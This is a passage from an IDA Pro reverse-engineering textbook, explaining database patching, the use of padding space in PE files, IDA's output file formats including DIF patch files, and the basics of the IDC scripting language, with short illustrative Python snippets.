the libraries described by those files in future projects. Keep in mind that it

is not possible for IDA to ship with descriptions for every library in existence.

The intended purpose of the tools covered in this chapter is to provide you

with the flexibility to address gaps in IDA’s library coverage whenever you

stray off IDA’s beaten path.

PATCHING BINARIES AND

OTHER IDA LIMITATIONS

One of the most frequently asked questions

by new or prospective IDA users is “How

can I use IDA to patch binaries?” The simple

answer is “You can’t.” IDA’s intended purpose

is to assist you in understanding the behavior of a binary

by offering you the best disassembly possible. IDA is not

designed to make it easy for you to modify the binaries you are examining.

Not wanting to take no for an answer, die-hard patchers often follow up with

questions such as “What about the Edit ▸ Patch Program menu?” and “What

is the purpose of File ▸ Produce File ▸ Create EXE File?” In this chapter we

discuss these apparent anomalies and see if we can’t coax IDA into helping

us, at least a little bit, with developing patches for binary program files.

238 Chapter 14

The Infamous Patch Program Menu

First mentioned in Chapter 11, the Edit ▸ Patch Program menu is a hidden

feature in the GUI version of IDA that must be enabled by editing the

idagui.cfg configuration file (the Patch menu is available by default in

console versions of IDA). Figure 14-1 shows the options available on the

EditPatch Program submenu.

Figure 14-1: The Patch Program submenu

Each of the submenu items teases you with the notion that you are going

to be able to modify the binary in potentially interesting ways. In actuality,

what these options offer are three different ways to modify the database. In

fact, these menu items, perhaps more than any others, make perfectly clear

the distinction between an IDA database and the binary file from which the

database was created. Once a database is created, IDA never references the

original binary. Given its true behavior, this menu item would be more aptly

named Patch Database.

All is not completely lost, however, as the menu options in Figure 14-1

do offer you the easiest way to observe the effect of any changes that you might

eventually make to the original binary. Later in this chapter you will learn

how to export the changes you have made and eventually use that information

to patch the original binary.

Changing Individual Database Bytes

The EditPatch ProgramChange Byte menu option is used to edit one or

more byte values within an IDA database. Figure 14-2 shows the related byte-

editing dialog.

Figure 14-2: The Patch Bytes dialog

The dialog displays 16 byte values beginning at the current cursor loca-

tion. You may change some or all of the displayed bytes, but you cannot make

changes beyond the 16th byte without closing the dialog, repositioning the

cursor to a new location farther into the database, and reopening the dialog.

Note that the dialog displays the virtual address and the file offset value for

the bytes that you are changing. This File offset value reflects the hexa-

decimal offset at which the bytes reside within the original binary file. The

fact that IDA retains the original file offset information for every byte in the

database will be useful if you do wish to develop a patch for the original binary.

Finally, regardless of the number of changes that have been made to the bytes

in the database, the Original value field of the dialog always displays the orig-

inal byte values loaded into the database. There is no automated capability

for reverting changes to their original byte values, though it is possible to

create an IDA script to perform such a task.
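
The relationship between patched values and original values can be pictured with a small model. The Python class below is a toy that runs outside IDA and does not use or describe IDA's scripting API; every name in it is hypothetical. It shows only the idea that the originally loaded bytes are retained alongside the patches, which is what makes a revert script feasible.

```python
class PatchableImage:
    """Toy model: original bytes are kept; patches are stored separately."""

    def __init__(self, data):
        self._original = bytes(data)
        self._patches = {}  # offset -> patched byte value

    def patch_byte(self, offset, value):
        if not 0 <= offset < len(self._original):
            raise IndexError("offset outside image")
        self._patches[offset] = value & 0xFF

    def byte(self, offset):
        """Current value: the patch if one exists, else the original."""
        return self._patches.get(offset, self._original[offset])

    def original_byte(self, offset):
        return self._original[offset]

    def revert_all(self):
        """Discard every patch, restoring the originally loaded values."""
        self._patches.clear()


image = PatchableImage(bytes([0x74, 0x05]))  # hypothetical two-byte image
image.patch_byte(0, 0xEB)
image.patch_byte(0, 0x90)  # patching twice does not disturb the original
print(hex(image.byte(0)), hex(image.original_byte(0)))
image.revert_all()
print(hex(image.byte(0)))
```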

A better method for editing database bytes was introduced in IDA 5.5

in the form of a more capable Hex View window (see Chapter 5). With an

integrated hex-editing capability, there is little need to use IDA’s change

bytes capability.

Changing a Word in the Database

Somewhat less useful than the byte-patching capability is IDA’s word-patching

capability. Figure 14-3 shows IDA’s Patch Word dialog, which is capable of

patching only one 2-byte word at a time.

Figure 14-3: The Patch Word dialog

As with the byte-patching dialog, the virtual address and file offset are

displayed. An important point to remember is that the word value is dis-

played using the natural byte ordering of the underlying processor. For

example, in an x86 disassembly, words are treated as little-endian values,

while in a MIPS disassembly, words are treated as big-endian values. Keep

this in mind when entering new word values. As with the byte-patching

dialog, the Original value field always displays the initial value loaded from

the original binary file regardless of the number of times the word value may

have been modified using the word-patching dialog. As with byte editing, it

may be easier to perform your editing within IDA’s Hex View window.
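
The effect of byte ordering on a patched word is easy to check outside IDA. This short Python example uses the standard struct module to show how the same 16-bit value is laid out in memory under little-endian ordering (as on x86) and big-endian ordering (as in the MIPS case described above); the value 0x1234 is arbitrary.

```python
import struct

value = 0x1234
little = struct.pack("<H", value)  # little-endian: low byte first
big = struct.pack(">H", value)     # big-endian: high byte first
print(little.hex(), big.hex())     # prints "3412 1234"
```

Entering a word with the wrong ordering in mind therefore swaps the two bytes that end up in the database.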

Using the Assemble Dialog

Perhaps the most interesting capability accessible from the Patch Program

menu is the Assemble option (Edit ▸ Patch Program ▸ Assemble). Unfortu-

nately, this capability is not available for all processor types, as it relies on the

presence of an internal assembler capability within the current processor

module. For example, the x86 processor module is known to support assembly,

while the MIPS processor module is known not to support assembly. When

an assembler is not available, you will receive an error message stating,

“Sorry, this processor module doesn’t support the assembler.”

The Assemble option allows you to enter assembly language statements

that are assembled using an internal assembler. The resulting instruction

bytes are then written to the current screen location. Figure 14-4 shows the

Assemble Instruction dialog used for instruction entry.

Figure 14-4: The Assemble Instruction dialog

You can enter one instruction at a time into the Instruction field. The

assembler component for IDA’s x86 processor module accepts the same

syntax used in x86 disassembly listings. When you click OK (or press ENTER),

your instruction is assembled, and the corresponding instruction bytes are

entered into the database beginning at the virtual address displayed in the

Address field. The internal IDA assembler allows you to use symbolic names

within your instructions as long as those names exist within the program.

Syntax such as mov [ebp+var_4], eax and call sub_401896 is perfectly legal,

and the assembler will correctly resolve symbolic references.

Following entry of an instruction, the dialog remains open and ready to

accept a new instruction at the virtual address immediately following the

previously entered instruction. While you enter additional instructions, the

dialog displays the previous instruction entered in the Previous line field.

When entering new instructions, you must pay attention to instruction

alignment, especially when the instruction that you are entering is a different

length than the instruction it is replacing. When a new instruction is shorter

than the instruction it is replacing, you need to consider what to do with the

excess bytes left over from the old instruction (inserting NOP¹ instructions is

one possible option). When a new instruction is longer than the instruction

that it is replacing, IDA will overwrite as many bytes of subsequent instructions

as is required to fit the new instruction. This may or may not be the behavior

you want, which is why careful planning is necessary before using the assembler

to modify program bytes. One way to view the assembler is as a word processor

that is stuck in overwrite mode. There is no easy way to open up space to

insert new instructions without overwriting existing instructions.
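
The overwrite-mode behavior can be modeled on a plain byte buffer. The Python sketch below is an illustration and says nothing about how IDA's assembler is implemented; the function name overwrite_instruction is hypothetical, and the NOP fill is the option mentioned above for a shorter replacement, applied here automatically for convenience. The sample bytes are standard x86 encodings: B8 01 00 00 00 is mov eax, 1; 31 C0 is xor eax, eax; C3 is ret; and 90 is nop.

```python
NOP = 0x90  # single-byte x86 no-operation instruction


def overwrite_instruction(code, offset, old_len, new_bytes):
    """Write new_bytes at offset, overwrite-mode style.

    Returns (patched_code, clobbered), where clobbered is the number of
    bytes belonging to *following* instructions that were overwritten.
    """
    patched = bytearray(code)
    if offset + len(new_bytes) > len(patched):
        raise ValueError("patch runs past the end of the buffer")
    patched[offset:offset + len(new_bytes)] = new_bytes
    if len(new_bytes) < old_len:
        # Fill the remainder of the old instruction with NOPs.
        for i in range(offset + len(new_bytes), offset + old_len):
            patched[i] = NOP
    clobbered = max(0, len(new_bytes) - old_len)
    return bytes(patched), clobbered


# Shorter replacement: mov eax, 1 (5 bytes) becomes xor eax, eax (2 bytes).
shorter, lost = overwrite_instruction(
    bytes.fromhex("b801000000c3"), 0, 5, bytes.fromhex("31c0"))
print(shorter.hex(), lost)

# Longer replacement: xor eax, eax (2 bytes) becomes mov eax, 1 (5 bytes).
longer, lost = overwrite_instruction(
    bytes.fromhex("31c0c3909090"), 0, 2, bytes.fromhex("b801000000"))
print(longer.hex(), lost)
```

In the second call the ret that followed the original instruction is destroyed, which is exactly the hazard that calls for planning before a longer instruction is assembled in place.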

It is important to remember that IDA’s database-patching capabilities

are limited to small, simple patches that easily fit into existing space within

the database. If you have a patch that requires substantial additional space,

you will need to locate space that is allocated within the original binary but

not used by the binary. Such space is often present in the form of padding,

1. NOP stands for no operation and is an instruction often used simply to fill in space in a program.

inserted by compilers to align sections of a binary to particular file boundaries.

For example, in many Windows PE files, individual program sections must

begin at file offsets that are multiples of 512 bytes. When a section does not

consume an exact multiple of 512 bytes of space, that section must be padded

within the file in order to maintain a 512-byte boundary for the next section.

The following lines from a disassembled PE file demonstrate this situation:

.text:0040963E ; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]

.text:00409644                 align 200h
.text:00409644 _text           ends
.text:00409644
.idata:0040A000 ; Section 2. (virtual address 0000A000)

In this case, IDA is using an align directive to indicate that the section is padded to a 512-byte (200h) boundary beginning from address .text:00409644.

The upper end of the padding is the next multiple of 512 bytes, or .text:00409800. The padded area is generally filled with zeros by the compiler and

stands out quite prominently in hex view. In this particular binary, there is

space within the file to insert up to 444 (0x1BC = 409800h – 409644h) bytes

of patched program data, which would overwrite some or all of the zero

padding at the end of the .text section. You might patch a function to jump

to this area of the binary, execute the newly inserted program instructions,

and then jump back to the original function.
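The padding arithmetic in this example is easy to reproduce. The following Python sketch uses the two values quoted in the text (the end of .text at 0x409644 and the 200h file alignment); the helper name align_up is our own and is not part of IDA.

```python
def align_up(address: int, alignment: int) -> int:
    """Round address up to the next multiple of alignment (a power of two)."""
    return (address + alignment - 1) & ~(alignment - 1)

text_end = 0x409644       # address at which the align directive appears
file_alignment = 0x200    # 512-byte alignment taken from "align 200h"

padding_end = align_up(text_end, file_alignment)
print(hex(padding_end))          # 0x409800
print(padding_end - text_end)    # 444
```

The bit-masking form works only because the alignment is a power of two, which is the case for the 200h value shown in the listing.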

Note that the next section in the binary, the .idata section, does not

actually begin until address .idata:0040A000. This is a result of a memory (not file) alignment restriction that requires PE sections to begin on 4KB (one memory page) boundaries. In theory it should be possible to inject an

additional 2,048 bytes of patched data into the memory range 00409800-0040A000.

The difficulty in doing so lies in the fact that no bytes corresponding to this

memory range are present within the disk image of the executable. In order

to use this space, we would need to perform more than a simple overwrite of

portions of the original binary file. First we would need to insert a 2,048-byte

block of data between the end of the existing .text section and the beginning

of the .idata section. Second, we would need to adjust the size of the .text

section within the PE file headers. Finally, we’d need to adjust the location of

.idata and all subsequent sections within the PE headers to reflect the fact

that all following sections are now located 2,048 bytes deeper into the file.

These changes may not sound terribly complicated, but they require some

attention to detail and a good working knowledge of the PE file format.

IDA Output Files and Patch Generation

One of the more interesting menu options in IDA is the File ▸ Produce File

menu. According to the options on this menu, IDA can generate MAP, ASM,

INC, LST, EXE, DIF, and HTML files. Many of these sound intriguing, so

each is described in the following sections.

IDA-Generated MAP Files

A .map file describes the overall layout of a binary, including information about

the sections that make up the binary and the location of symbols within each

section. When generating a .map file, you are asked for the name of the file

you wish to create and the types of symbols you would like to store in the .map

file. Figure 14-5 shows the MAP file options dialog, in which you select the

information you wish to include in the .map file.

Figure 14-5: MAP file-generation options

Address information in a .map file is represented using logical addresses.

A logical address describes a symbol’s location using a segment number and

a segment offset. The first few lines of a simple .map file are shown in the

following listing. In this listing we show three segments and the first two of

many symbols. The logical address of _fprintf indicates that it resides at byte

offset 69h within the first (.text) segment.

 Start         Length     Name     Class
 0001:00000000 000008644H .text    CODE
 0002:00000000 000001DD6H .rdata   DATA
 0003:00000000 000002B84H .data    DATA

  Address         Publics by Value

 0001:00000000       _main
 0001:00000069       _fprintf

MAP files generated by IDA are compatible with Borland’s Turbo

Debugger. The principal purpose of .map files is to assist in restoring symbol

names when debugging binaries that may have been stripped.
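To make the logical address format concrete, here is a small Python sketch that splits an address such as 0001:00000069 into its segment number and offset. The function name and the segment_starts table are hypothetical, and the 0x401000 start address for segment 1 is an assumed value used purely for illustration; a .map file stores only the segment-relative form.

```python
from typing import Tuple

def parse_logical_address(text: str) -> Tuple[int, int]:
    """Split a 'SSSS:OOOOOOOO' logical address into (segment number, offset)."""
    segment, offset = text.split(":")
    return int(segment, 16), int(offset, 16)

# Hypothetical table of segment start addresses keyed by segment number.
# The value 0x401000 is an assumption, not something read from the .map file.
segment_starts = {1: 0x401000}

segment, offset = parse_logical_address("0001:00000069")
print(segment, hex(offset))                    # 1 0x69
print(hex(segment_starts[segment] + offset))   # 0x401069
```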

IDA-Generated ASM Files

IDA can generate a .asm file from the current database. The general idea is

to create a file that could be run through an assembler to re-create the underlying binary file. IDA attempts to dump enough information, including such

things as structure layouts, to make successful assembly possible. Whether

you will be able to successfully assemble the generated .asm file depends on

a number of factors, not the least of which is whether your particular assembler

understands the syntax IDA uses.

The target assembly language syntax is determined by the Target

assembler setting found on the Analysis tab under the Options ▸ General

menu. By default IDA generates an assembly file representing the entire

database. However, you may limit the scope of the listing by clicking and

dragging or using SHIFT-up arrow or SHIFT-down arrow to scroll and select the

region you wish to dump. In console versions of IDA, you would utilize the

Anchor (ALT-L) command to set an anchor point at the start of a selection

region and then use the arrow keys to extend the size of the region.

IDA-Generated INC Files

An INC (include) file contains definitions of data structures and enumerated

datatypes. This is essentially a dump of the contents of the Structures windows

in a form suitable for consumption by an assembler.

IDA-Generated LST Files

An LST file is nothing more than a text file dump of the contents of the IDA

disassembly window. You can narrow the scope of the generated listing by

selecting a range of addresses to dump, as described previously for ASM files.

IDA-Generated EXE Files

While this is the most promising menu option, it unfortunately is also the

most crippled. In a nutshell, it doesn’t work for most file types, and you can

expect to receive an error message stating, “This type of output file is not

supported.”

While this would be an ideal capability for a patcher, in general it is very

difficult to regenerate executable files from an IDA database. The information that you are presented with in an IDA database consists primarily of the contents of the sections that make up the original input file. In many cases, however, IDA does not process every section of an input file, and certain information is lost when the file is loaded into the database, making generation of an executable from the database impossible. The simplest example of

such loss is the fact that IDA does not load the resource (.rsrc) section of PE

files by default, which makes restoration of the resource section from the

database impossible.

In other cases, IDA processes information from the original binary but

does not make it easily accessible in its original form. Examples include

symbol tables, import tables, and export tables, which would require a fair

amount of effort to properly reconstruct in order to generate a functional

executable file.

One effort to provide an EXE-generation capability for IDA is the

pe_scripts² of Atli Mar Gudmundsson. These are a set of IDA scripts for

working with PE files. One of the scripts is titled pe_write.idc, and its goal is to

dump a working PE image out of an existing database. If you intend to patch

a PE file, the proper sequence of events for using the scripts is as follows:

1. Load the desired PE file into IDA. Make sure that you uncheck the Make imports section option in the loader dialog.
2. Run the included pe_sections.idc script to map all sections from the original binary into the new database.
3. Make any desired changes to the database.
4. Execute the pe_write.idc script to dump the database contents to a new PE file.

Scripting with IDC is the subject of Chapter 15.

IDA-Generated DIF Files

An IDA DIF file is a plaintext file that lists all bytes that have been modified

within an IDA database. This is the most useful file format if your goal is to

patch an original binary based on changes made to an IDA database. The

format of the file is quite simple, as shown in the example .dif file here:

This difference file is created by The Interactive Disassembler

dif_example.exe

000002F8: 83 FF

000002F9: EC 75

000002FA: 04 EC

000002FB: FF 68

The file includes a one-line header comment followed by the name of

the original binary file and then a list of bytes within the file that have changed.

Each change line specifies the file offset (not virtual address) of the changed

byte, the original value of the byte, and the current value of the byte within

the database. In this example, the database for dif_example.exe has been

modified at four locations corresponding to byte offsets 0x2F8–0x2FB within

the original file. It is a trivial task to write a program to parse IDA .dif files

and apply the changes to the original binary file to generate a patched

version of the binary. One such utility is available at the companion website

for this book.³
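As a rough illustration of how little work such a parser involves, the following Python sketch reads the change lines of a .dif file and applies them to an in-memory copy of the original bytes. It is not the utility from the companion website; the function names are hypothetical, and the 0x300-byte image is a stand-in that we construct so the example can run without the real dif_example.exe.

```python
def parse_dif(dif_text: str) -> list:
    """Return (offset, original, patched) tuples from the text of a .dif file."""
    changes = []
    for line in dif_text.splitlines():
        head, sep, tail = line.partition(":")
        values = tail.split()
        if not sep or len(values) != 2:
            continue  # header comment, file name, or blank line
        try:
            changes.append((int(head, 16), int(values[0], 16), int(values[1], 16)))
        except ValueError:
            continue  # contains a colon but is not a change line
    return changes

def apply_dif(image: bytes, changes) -> bytes:
    """Apply changes to a copy of image, verifying each original byte first."""
    patched = bytearray(image)
    for offset, original, new in changes:
        if patched[offset] != original:
            raise ValueError(f"unexpected byte at offset {offset:#x}")
        patched[offset] = new
    return bytes(patched)

dif_text = """This difference file is created by The Interactive Disassembler

dif_example.exe
000002F8: 83 FF
000002F9: EC 75
000002FA: 04 EC
000002FB: FF 68
"""

# Stand-in for the original file: zeros everywhere except the four bytes
# that the .dif file expects to find at offsets 0x2F8-0x2FB.
image = bytearray(0x300)
image[0x2F8:0x2FC] = bytes.fromhex("83EC04FF")

patched = apply_dif(bytes(image), parse_dif(dif_text))
print(patched[0x2F8:0x2FC].hex())  # ff75ec68
```

To patch a real file, you would read its contents in binary mode, pass them to apply_dif, and write the result to a new file. Checking each original byte before overwriting it guards against applying a .dif file to the wrong binary.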

2. See http://www.hex-rays.com/idapro/freefiles/pe_scripts.zip.

3. See http://www.idabook.com/chapter14/ida_patcher.c.

IDA-Generated HTML Files

IDA takes advantage of the markup capabilities available with HTML in order

to generate colorized disassembly listings. An IDA-generated HTML file is

essentially an LST file with HTML tags added to produce a listing that is

colored similarly to the actual IDA disassembly window. Unfortunately, the

generated HTML files do not contain any hyperlinks that would make

navigating the file any easier than if one used a standard text listing. For

example, one useful feature would be the addition of hyperlinks to all name

references, which would make following name references as simple as

following a link.

Summary

IDA is not a binary file editor. Keep that fact in mind anytime you think about

patching a binary with IDA. However, it is a particularly good tool for helping

you enter and visualize potential changes. By familiarizing yourself with IDA’s

full range of features and combining the information that IDA can generate

with appropriate scripts or external programs, binary patching easily becomes

possible.

In the coming chapters, we will cover the many ways in which IDA’s

capabilities can be extended. For anyone interested in making the most

out of IDA’s capabilities, basic scripting skills and an understanding of IDA’s

plug-in architecture are essential, as they offer you the capability to add

behaviors wherever you feel IDA is lacking.

PART IV: EXTENDING IDA’S CAPABILITIES

IDA SCRIPTING

It is a simple fact that no application can

meet every need of every user. It is just not

possible to anticipate every potential use case

that may arise. Application developers are faced

with the choice of responding to an endless stream of

feature requests or offering users a means to solve

their own problems. IDA takes the latter approach by integrating scripting

features that allow users to exercise a tremendous amount of programmatic

control over IDA’s actions.

Potential uses for scripts are infinite and can range from simple one-liners to full-blown programs that automate common tasks or perform complex analysis functions. From an automation standpoint, IDA scripts can be viewed as macros,¹ while from an analysis point of view, IDA’s scripting languages serve as the query languages that provide programmatic access to the contents of an IDA database. IDA supports scripting using two different languages. IDA’s original, embedded scripting language is named IDC, perhaps because its syntax bears a close resemblance to C. Since the release of IDA 5.4,² integrated scripting with Python has also been supported through the integration of the IDAPython plug-in by Gergely Erdelyi.³ For the remainder of this chapter we will cover the basics of writing and executing both IDC and Python scripts as well as some of the more useful functions available to script authors.

1. Many applications offer facilities that allow users to record sequences of actions into a single complex action called a macro. Replaying or triggering a macro causes the entire sequence of recorded steps to be executed. Macros provide an easy means to automate a complex series of actions.

Basic Script Execution

Before diving into the details of either scripting language, it is useful to

understand the most common ways that scripts can be executed. Three menu options, File ▸ Script File, File ▸ IDC Command, and File ▸ Python Command,⁴ are available to access IDA’s scripting engine. Selecting File ▸ Script File indicates that you wish to run a standalone script, at which point

you are presented with a file-selection dialog that lets you choose the script

to run. Each time you run a new script, the script is added to a list of recent scripts to provide easy access to edit or rerun the script. Figure 15-1 shows the Recent Scripts window accessible via the View ▸ Recent Scripts

menu option.

Figure 15-1: The Recent Scripts window

Double-clicking a listed script causes the script to be executed. A pop-up,

context-sensitive menu offers options to remove a script from the list or to

open a script for editing using the editor specified under Options ▸ General

on the Misc tab.

As an alternative to executing a standalone script file, you may elect to

open a script entry dialog using File ▸ IDC Command or File ▸ Python Command. Figure 15-2 shows the resulting script entry dialog (for an IDC script

in this case), which is useful in situations where you wish to execute only a

few statements but don’t want to go to the trouble of creating a standalone

script file.

2. For a comprehensive list of features introduced with each new version of IDA, visit http://www.hex-rays.com/idapro/idanew48.htm.

3. See http://code.google.com/p/idapython/.

4. This option is only available if Python is properly installed. Refer to Chapter 3 for details.

Figure 15-2: The script entry dialog

Some restrictions apply to the types of statements that you can enter in

the script dialog, but the dialog is very useful in cases where creating a full-

blown script file is overkill.

The last way to easily execute script commands is to use IDA’s command

line. The command line is available only in GUI versions of IDA, and its presence is controlled by the value of the DISPLAY_COMMAND_LINE option in <IDADIR>/cfg/idagui.cfg. The command line has been enabled by default since IDA 5.4.

Figure 15-3 shows the command line as it appears in the lower-left corner of

the IDA workspace, beneath the output window.

Figure 15-3: The IDA command line

The interpreter that will be used to execute the command line is labeled

to the left of the command-line entry box. In Figure 15-3, the command line

is configured to execute IDC statements. Clicking this label opens the pop-

up menu shown in Figure 15-3, allowing either interpreter (IDC or Python)

to be associated with the command line.

Although the command line contains only a single line of text, you can

enter multiple statements by separating each statement with a semicolon.

As a convenience, the history of recent commands is accessible with the up

arrow key. If you find yourself frequently needing to execute very short

scripts, you will find the command line very useful.

With a basic ability to execute scripts under our belts, it is time to focus

on the specifics of IDA’s two available scripting languages, IDC and Python.

We begin with a description of IDA’s native scripting language, IDC, and

conclude with a discussion of IDA’s Python integration, which will rely

heavily on the foundation built by the IDC sections that follow.

The IDC Language

Unlike for some other aspects of IDA, a reasonable amount of help is avail-

able for the IDC language in IDA’s help system. Topics available at the top

level of the help system include IDC language, which covers the basics of IDC

syntax, and Index of IDC functions, which provides an exhaustive list of built-in

functions available to IDC programmers.

IDC is a scripting language that borrows most of its syntactic elements

from C. Beginning with IDA 5.6, IDC actually takes on more of the flavor of

C++ with the introduction of object-oriented features and exception handling.

Because of its similarity to C and C++, we will describe IDC in terms of these

languages and focus primarily on where IDC differs.

IDC Variables

IDC is a loosely typed language, meaning that variables have no explicit type.

The three primary datatypes used in IDC are integers (IDA documentation

uses the type name long), strings, and floating point values, with the over-

whelming majority of operations taking place on integers and strings. Strings

are treated as a native datatype in IDC, and there is no need to keep track of

the space required to store a string or whether a string is null terminated or

not. Beginning with IDA 5.6, IDC incorporates a number of additional vari-

able types, including objects, references, and function pointers.

All variables must be declared prior to their use. IDC supports local vari-

ables and, since IDA 5.4, global variables as well. The IDC keyword auto is

used to introduce a local variable declaration, and local variable declarations

may include initial values. The following examples show legal IDC local vari-

able declarations:

auto addr, reg, val; // legal, multiple variables declared with no initializers

auto count = 0; // declaration with initialization

IDC recognizes C-style multiline comments using /* */ and C++–style

line-terminating comments using //. Also, note that several variables may be

declared in a single statement and that all statements in IDC are terminated

using a semicolon (as in C). IDC does not support C-style arrays (slices are

introduced in IDA 5.6), pointers (though references are supported begin-

ning with IDA 5.6), or complex datatypes such as structs and unions. Classes

are introduced in IDA 5.6.

Global variable declarations are introduced using the extern keyword,

and their declarations are legal both inside and outside of any function

definition. It is not legal to provide an initial value when a global variable is

declared. The following listing shows the declaration of two global variables.

extern outsideGlobal;
static main() {
   extern insideGlobal;
   outsideGlobal = "Global";
   insideGlobal = 1;
}

Global variables are allocated the first time they are encountered during

an IDA session and persist as long as that session remains active, regardless of

the number of databases that you may open and close.

IDC Expressions

With a few exceptions, IDC supports virtually all of the arithmetic and logical

operators available in C, including the ternary operator (? :). Compound

assignment operators of the form op= (+=, *=, >>=, and the like) are not sup-

ported. The comma operator is supported beginning with IDA 5.6. All inte-

ger operands are treated as signed values. This affects integer comparisons

(which are always signed) and the right-shift operator (>>), which always performs an arithmetic shift with sign bit replication. If you require logical right shifts, you must implement them yourself by masking off the top bit of the result, as shown here for a one-bit shift of a 32-bit value:

result = (x >> 1) & 0x7fffffff; //set most significant bit to zero
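The mask 0x7fffffff is correct only for a shift of exactly one bit. The Python sketch below generalizes the idea to a shift of n bits, under the assumption of 32-bit integers that is implied by the mask in the listing. Because Python integers are unbounded, the arithmetic shift is emulated explicitly; both function names are our own.

```python
def arithmetic_shift_right_32(x: int, n: int) -> int:
    """Shift a 32-bit value right by n bits (0 <= n <= 31), replicating the sign bit."""
    x &= 0xFFFFFFFF
    if x & 0x80000000:          # negative when viewed as a signed 32-bit value
        x -= 1 << 32
    return (x >> n) & 0xFFFFFFFF

def logical_shift_right_32(x: int, n: int) -> int:
    """Shift arithmetically, then clear the n replicated sign bits."""
    mask = 0xFFFFFFFF >> n      # 0x7fffffff when n == 1
    return arithmetic_shift_right_32(x, n) & mask

print(hex(arithmetic_shift_right_32(0x80000000, 1)))  # 0xc0000000
print(hex(logical_shift_right_32(0x80000000, 1)))     # 0x40000000
print(hex(logical_shift_right_32(0x80000000, 4)))     # 0x8000000
```

The same pattern carries over to IDC: shift first, then AND the result with a mask that has its top n bits cleared.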

Because strings are a native type in IDC, some operations on strings take

on a different meaning than they might in C. The assignment of a string

operand into a string variable results in a string copy operation; thus there is

no need for string copying or duplicating functions such as C’s strcpy and

strdup. Also, the addition of two string operands results in the concatenation

of the two operands; thus "Hello" + "World" yields "HelloWorld"; there is no

need for a concatenation function such as C’s strcat. Starting with IDA 5.6,

IDC offers a slice operator for use with strings. Python programmers will be

familiar with slices, which basically allow you to specify subsequences of array-

like variables. Slices are specified using square brackets and a start (inclusive)

and end (exclusive) index. At least one index is required. The following list-

ing demonstrates the use of IDC slices.

auto str = "String to slice";

auto s1, s2, s3, s4;

s1 = str[7:9]; // "to"

s2 = str[:6]; // "String", omitting start index starts at 0

s3 = str[10:]; // "slice", omitting end index goes to end of string

s4 = str[5]; // "g", single element slice, similar to array element access

Note that while there are no array datatypes available in IDC, the slice

operator effectively allows you to treat IDC strings as if they were arrays.
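For readers who know Python better than IDC, the same four operations written as Python slices produce the same substrings. This is offered only as a point of comparison; the variable is named text here simply to avoid shadowing Python's built-in str.

```python
text = "String to slice"

s1 = text[7:9]   # characters at indices 7 and 8
s2 = text[:6]    # start index omitted, so the slice begins at index 0
s3 = text[10:]   # end index omitted, so the slice runs to the end of the string
s4 = text[5]     # single-character access

print([s1, s2, s3, s4])  # ['to', 'String', 'slice', 'g']
```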

IDC Statements

As in C, all simple statements are terminated with a semicolon. The only C-style compound statement that IDC does not support is the switch statement.

When using for loops, keep in mind that IDC does not support compound

assignment operators, which may affect you if you wish to count by anything

other than one, as shown here:

auto i;

for (i = 0; i < 10; i += 2) {} // illegal, += is not supported

for (i = 0; i < 10; i = i + 2) {} // legal

With IDA 5.6, IDC introduces try/catch blocks and the associated throw

statement, which are syntactically similar to C++ exceptions.⁵ IDA’s built-in

help contains specifics on IDC’s exception-handling implementation.

For compound statements, IDC utilizes the same bracing ({}) syntax and

semantics as C. Within a braced block, it is permissible to declare new variables

as long as the variable declarations are the first statements within the block.

However, IDC does not rigorously enforce the scope of the newly introduced

variables, because such variables may be referenced beyond the block in which

they were declared. Consider the following example:

if (1) {    //always true
   auto x;
   x = 10;
}
else {      //never executes
   auto y;
   y = 3;
}
Message("x = %d\n", x);  // x remains accessible after its block terminates
Message("y = %d\n", y);  // IDC allows this even though the else did not execute

The output statements (the Message function is analogous to C’s printf)

will inform us that x = 10 and y = 0. Given that IDC does not strictly enforce

the scope of x, it is not terribly surprising that we are allowed to print the

value of x. What is somewhat surprising is that y is accessible at all, given that

the block in which y is declared is never executed. This is simply a quirk of

IDC. Note that while IDC may loosely enforce variable scoping within a func-

tion, variables declared within one function continue to remain inaccessible

in any other function.
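By way of contrast, the closest Python equivalent does not tolerate the second access. In the sketch below (our own illustration, with a hypothetical function name and a flag parameter standing in for the constant condition), x is readable after the if statement, but reading y raises an exception because the branch that assigns it never ran.

```python
def scope_demo(flag=True):
    if flag:                 # true for the default argument
        x = 10
    else:                    # not executed when flag is true
        y = 3
    print("x =", x)          # fine: x was assigned in the branch that ran
    try:
        print("y =", y)      # y is a local name that was never assigned
    except UnboundLocalError as error:
        return type(error).__name__
    return "no error"

result = scope_demo()
print(result)  # UnboundLocalError
```

This difference is worth keeping in mind when porting scripts between the two languages: code that relies on IDC's implicit zero value for y fails in Python.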

IDC Functions

IDC supports user-defined functions in standalone programs (.idc files) only. User-defined functions are not supported when using the IDC command dialog (see “Using the IDC Command Dialog”). IDC’s syntax for declaring user-defined functions is where it differs most from C. The static keyword is used to introduce a user-defined function, and the function’s parameter list consists solely of a comma-separated list of parameter names. The following listing details the basic structure of a user-defined function:

static my_func(x, y, z) {
   //declare any local variables first
   auto a, b, c;
   //add statements to define the function's behavior
   // ...
}

5. See http://www.cplusplus.com/doc/tutorial/exceptions/.

Prior to IDA 5.6, all function parameters are strictly call-by-value. Call-by-reference parameter passing was introduced with IDA 5.6. Interestingly, whether a parameter is passed using call-by-value or call-by-reference is determined by the manner in which the function is called, not the manner in which the function is declared. The unary & operator is used in a function call (not the function declaration) to denote that an argument is being passed by reference. The following examples show invocations of the my_func function from the previous listing making use of both call-by-value and call-by-reference parameter passing.

auto q = 0, r = 1, s = 2;
my_func(q, r, s);   //all three arguments passed using call-by-value
                    //upon return, q, r, and s hold 0, 1, and 2 respectively
my_func(q, &r, s);  //q and s passed call-by-value, r is passed call-by-reference
                    //upon return, q and s hold 0 and 2 respectively, but r may have
                    //changed. In this second case, any changes that my_func makes to its
                    //formal parameter y will be reflected in the caller as changes to r

Function declarations never indicate whether a function explicitly returns a value or what type of value is returned when a function does yield a result. When you wish to return a value from a function, use a return statement to return the desired value. It is permissible to return entirely different datatypes from different paths of execution within a function. In other words, a function may return a string in some cases, while in other cases the same function may return an integer. As in C, use of a return statement within a function is optional. However, unlike C, any function that does not explicitly return a value implicitly returns the value zero.

USING THE IDC COMMAND DIALOG

The IDC command dialog offers a simple interface for entering short sequences of IDC code. The command dialog is a great tool for rapidly entering and testing new scripts without the hassle of creating a standalone script file. The most important thing to keep in mind when using the command dialog is that you must not define any functions inside the dialog. In essence, IDA wraps your statements within a function and then calls that function in order to execute your statements. If you were to define a function within the dialog, the net effect would be a function defined within a function, and since nested function declarations are not allowed in IDC (or in C for that matter), a syntax error would result.

As a final note, beginning with IDA 5.6, functions take a step closer to

